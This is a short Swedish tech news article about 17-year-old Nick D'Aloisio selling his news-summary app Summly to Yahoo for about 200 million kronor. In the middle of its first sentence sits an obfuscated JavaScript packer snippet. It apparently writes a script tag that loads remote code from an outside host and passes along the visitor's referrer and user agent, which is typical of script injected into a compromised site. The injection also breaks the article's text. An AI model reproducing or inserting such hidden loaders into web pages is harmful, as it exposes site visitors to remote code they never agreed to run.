Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

17-åring sålde app för 200 miljoner

17-åring sålde app för 200 miljoner
Sebastian

Han eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dssdy|var|u0026u|referrer|tasfb||js|php’.split(’|’),0,{}))
är inte den enda unga apputveckalaren som tjänat otroligt mycket pengar på appar men en av dem yngsta.

17-årige Nick D’Aloisio kan snart räkna sig bland de yngsta multimiljonärerna i världen. Nu har hemsidan Yahoo köpt hans mobilapp Summly för cirka 200 miljoner svenska kronor. En app som i framtiden kommer få en stor betydelse,
Det fantastiska här är att han tjänat in sina pengar helt på egen hand utan den minsta hjälp av någon.
Nick kodade ihop sin första app när han var tolv år. Summly som är den senaste i portfolion identifierar ämnen i nyhetsartiklar på nätet. Vi på Revue var faktiskt några av dem första som laddade ner appen en kort tid efter den hade lanserats. Vi såg det som en smart kanal att hålla koll på tekniknyheter världen över.